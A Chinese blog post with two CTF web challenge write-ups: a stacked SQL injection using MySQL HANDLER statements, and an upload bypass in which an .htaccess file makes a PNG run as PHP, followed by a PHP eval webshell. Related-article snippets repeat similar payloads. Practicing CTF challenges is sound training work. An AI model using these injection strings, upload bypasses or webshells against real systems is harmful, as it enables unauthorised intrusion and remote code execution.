一天一道ctf 第19天(handler sql注入,.htaccess文件上传)

最新推荐文章于 2023-09-23 00:38:03 发布
原创 最新推荐文章于 2023-09-23 00:38:03 发布 · 255 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了两道CTF比赛中的Web安全题目,涉及文件上传漏洞的利用。第一题通过handler语句绕过过滤,第二题利用.htaccess配置让服务器将上传的图片当作PHP解析,实现一句话木马的执行。关键步骤包括修改文件类型、上传配置文件及后门文件,以及使用蚁剑进行远程连接。

[GYCTF2020]Blacklist
一个小知识点,题目和之前强网杯的随便注差不多,只是过滤的东西多了很多,那就不能更改表名了。这里用的是handler语句

1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#

在这里插入图片描述
在这里插入图片描述

[MRCTF2020]你传你🐎呢
这题和之前做过的一道文件上传题很像,都是先上传一个配置文件为之后上传的一句话木马开启一个后门(除了作者是个祖安以外)之前一道题传的是.user.ini文件,这道题传的是.htacsess文件。上传.htaccess可以更改配置,目的是为了让服务器能把我们后面上传的文件当作php来解析。

//.htacsess
<FilesMatch "1.png">
SetHandler application/x-httpd-php
</FilesMatch>

上传的时候记得抓包把Concent Type改成image/png
再上传一句话木马1.png

//1.png
<?php
@eval($_POST['shell']);
?>

上传成功以后蚁剑连接回显的1.png地址http://e0ced744-d17c-4295-9063-074dfc00ce30.node3.buuoj.cn/upload/…/1.png

scrawman
关注
sql注入--handler语句--一文详细解说其原理和方法
贤鱼的博客
09-20 956
handler 语句使用方法
【web-ctf总结】ctf_BUUCTF_web_总结(待更新)
一个努力生活的人的博客
05-12 1052
ctf_web
sql 注入 handler命令
20岁爱吃必胜客
03-15 1186
HANDLER tbl_name OPEN [ [AS] alias] HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,…) [ WHERE where_condition ] [LIMIT … ] HANDLER tbl_name READ index_name { FIRST...
SQL注入Handler命令和堆叠注入
2201_75316477的博客
03-16 1100
mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中。HANDLER语句提供通往表的直接通道的存储引擎接口,可以用于MyISAM和InnoDB表。
Buuctfhandler的使用)[强网杯 2019]随便注 1)+([GYCTF2020]Blacklist 1)
m0_64444909的博客
05-23 454
判断闭合方式 方法一.使用(转义字符)\来判断SQL注入的闭合方式,看\斜杠后面跟着的字符,是什么字符,它的闭合字符就是什么,若是没有,就为数字型。 方法二.首先尝试: ?id=1’ ?id=1" 结果一:如果都报错 判断闭合符为:整形闭合。 结果二:如果单引号报错,双引号不报错 继续尝试: ?id=1’ # 结果一:无报错 判断闭合符为:单引号闭合。 结果二:报错 判断闭合符可能为:单引号加括号。 结果三:如果单引号不报错,双引号报错 最后尝试: ?id=1" # 结果一:结果无报错 判断闭合符为:双引号
[GYCTF2020]Blacklist 使用handler函数进行sql注入
EC_Carrot的博客
10-26 472
[GYCTF2020]Blacklist 前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 参考了高诺琪师傅的文章:https://www.cnblogs.com/gaonuoqi/p/12398554.html 一、收集信息 过滤了很多东西,过滤了prepare预编译用不了,过滤了alter也是用不了改表、列名。 但可以查看一下表名 1';show tables;# 有两个表,查看一下FlagH
CTF网络攻防笔记
濯君
04-18 1292
1, X-Forwarded-For: 用来表示 HTTP 请求端真实 IP,伪造本地访问。 在HTTP请求头里设置:X-Forwarded-For: 127.0.0.1,修改请求IP为本地IP。 2,在HTTP请求头里设置, referer: 告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。 3, 常用编解码:md5, url编码(有很多%的),base64(结尾是=),HTML页面内容utf-8编解码 4,PHP里比较值不相等,md5,sha1编码之后的值相等,要绕过,构造数
题解记录-BUUCTF|Web (持续更新中)
weixin_57448435的博客
09-17 3255
BUUCTF Web
NewStarCTF 公开赛赛道
shinygod的博客
10-06 2294
基础练习
buuctf刷题之旅之web()
qq_50589021的博客
08-17 6849
2021-01-15 第一题:[HCTF 2018]WarmUp 这里懒得上传图片了,所以就直接笔记了 源代码里面有1.source.php,所以打开以后还会发先2.hint.php 1打开后会发现是代码审计 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["s
CTF之web学习记录 -- SQL注入进阶
lifanxin的博客
05-19 719
SQL注入进阶概述时间注入攻击堆叠查询注入攻击二次注入攻击宽字节注入攻击cookie注入攻击base64注入攻击XFF注入攻击总结 概述   这一部分的内容是sql注入知识的进阶部分,引入了更多的注入技巧。 时间注入攻击   时间注入攻击的场景同样也是服务器并不返回查询语句的信息,这和boolean注入攻击类似,boolean注入通过true或false来进行数据库信息猜测。时间注入攻击通过利用sleep()或benchmark()等函数让数据库操作时间变长,以此来判断语句是否成功执行。 # 判断数据库名长
PHP htaccess注入备忘单
bylfsj的博客
10-31 652
情境 在Apache / mod_php的安装程序中,攻击者能够注入.htaccess(或php.ini或apache配置)。注入目录中设置了AllowOverride Options(或AllowOverride All,这也是很常见的)。 例子 示例1a:文件包含 index.php :(空) .htaccess: php_value auto_append_file /etc/hosts...
CTFHub技能树之web文件上传.htaccess
qq_53148935的博客
04-04 966
注:本人第一次写博客,主要是为了记录解题过程,如有不足之处,欢迎指出,但勿喷。 这几开始做了些ctfhub技能树里面的题目,因为我们这学期开始学了一些web攻防的内容,然后就想着去ctfhub练练技能,话不多说,我们直接进入解题过程。 先看看题目 这里给了些提示内容,说htaccess文件是apache的一个配置文件之类的,有兴趣可以自行百度了解一下。在这题里面,htaccess文件的作用就是让别的文件以你指定的方式运行,如.txt文件可以以.php文件的形式运行。 了解了这些之后我们就会有一
文件上传漏洞基础/htaccess重写解析绕过/大小写绕过上传/windows特性绕过
ChenD的学习笔记
10-22 5297
htaccess文件可以帮我们实现包括:文件夹密码保护、用户自动重定向、自定义错误页面、改变文件扩展名、封禁特定IP地址的用户、只允许特定IP地址的用户、禁止目录列表,以及使用其他文件作为index文件等一些功能!有的黑名单没有对后缀名的大小写进行严格判断(一般不会有),导致可以更改后缀大小写绕过,如PHP、Php、pHp、PhP、pHP....Windows中后缀名.,系统会自动忽略末尾的".",所以可以通过在末尾加.来进行绕过。到这里我们能发现,前面的代码没有一行是没用的,每一行都针对一种上传方法!
编辑.htaccess文件执行任意代码(CVE-2022-25578)
热门推荐
Battery的博客
09-23 12万+
CVE-2022-25578是Taocms v3.0.2中存在的一个安全漏洞,该漏洞允许攻击者通过任意编辑.htaccess文件来执行代码注入攻击。Taocms是一个完善支持多数据库(Sqlite/Mysql)的CMS网站内容管理系统,是国内最小且功能完善的基于php+SQLite/Mysql的CMS管理系统。该系统体积小、速度快,包含文件管理、数据采集、Memcache整合、用户管理等强大功能,且跨平台运行,支持SAE、BAE云服务,以及阿里云虚拟主机。
.htaccess 文件攻击上传shell
lenkee的博客
12-03 3782
.htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置.通过htaccess文件,可以实现:网页301重定向、自定义404页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。 1.创建htaccess文件,编辑内容为: SetHandler application/x-httpd-php 他的意思是将该目录下的所有文...
文件上传
qq_53142368的博客
08-30 283
文章目录一、文件上传1,无验证2,前端验证3,.htaccess4,MIME绕过 一、文件上传 1,无验证 上传一句话木马 <?php @eval($_POST["a"]);?> 然后蚁剑连接 。。。 2,前端验证 发现只能上传这几种格式的文件,这里是js前端验证,所以用bp拦截后,再通过bp将jpg改为php,用蚁剑拦截 3,.htaccess htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重
CTF入门笔记之SQL注入
qq_37410729的博客
11-01 3373
sql注入
CTF-SQL注入
weixin_44770698的博客
06-16 5770
CTF-SQL注入题目整理
ctfhub .htaccess文件上传 报500错误
最新发布
02-13
### CTFHub平台上.htaccess文件上传导致500错误解决方案 当遇到CTFHub平台上的`.htaccess`文件上传引发的500内部服务器错误时,通常是因为Apache配置不当或存在语法错误所致[^1]。 #### Apache日志分析 为了诊断具体原因,应当查看Apache的日志文件。这些日志可以提供关于为何发生500错误的具体线索。一般情况下,在Linux系统上,默认路径位于 `/var/log/apache2/error.log` 或者 `/var/log/httpd/error_log` 中。通过检查最近条目中的警告和错误消息来定位问题所在[^2]。 #### 配置验证 确保本地测试环境下的Apache版本与目标服务器一致,并尝试加载相同的 `.htaccess` 文件以重现此问题。如果确实出现了同样的500错误,则可能是由于该文件内的指令不被当前使用的Apache模块支持所引起。此时应仔细核对每一条规则并查阅官方文档确认其兼容性和正确性[^3]。 #### 权限设置 另一个常见的原因是权限不足。即使语法完全无误,但如果Web服务器进程无法读取到这个隐藏文件的话也会报错。因此要保证 `.htaccess` 及其所在的目录具有适当的所有权以及755 (rwxr-xr-x) 的访问模式[^4]。 ```bash chmod 755 /path/to/directory/.htaccess chown www-R ``` 以上命令假设运行的是基于Debian系的操作系统;对于其他发行版可能需要调整用户组名称。 #### PHP解析器冲突 有时PHP脚本试图处理非预期类型的请求也可能触发此类异常情况。特别是当涉及到动态内容生成的时候更应该注意这一点。可以通过禁用不必要的处理器或将特定扩展名排除在外的方式来规避潜在的风险[^5]。 ```apacheconf <FilesMatch "\.(php|phtml)$"> SetHandler application/x-httpd-php </FilesMatch> ``` 上述代码片段展示了如何仅允许指定后缀名由PHP引擎解释执行的方法之一。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值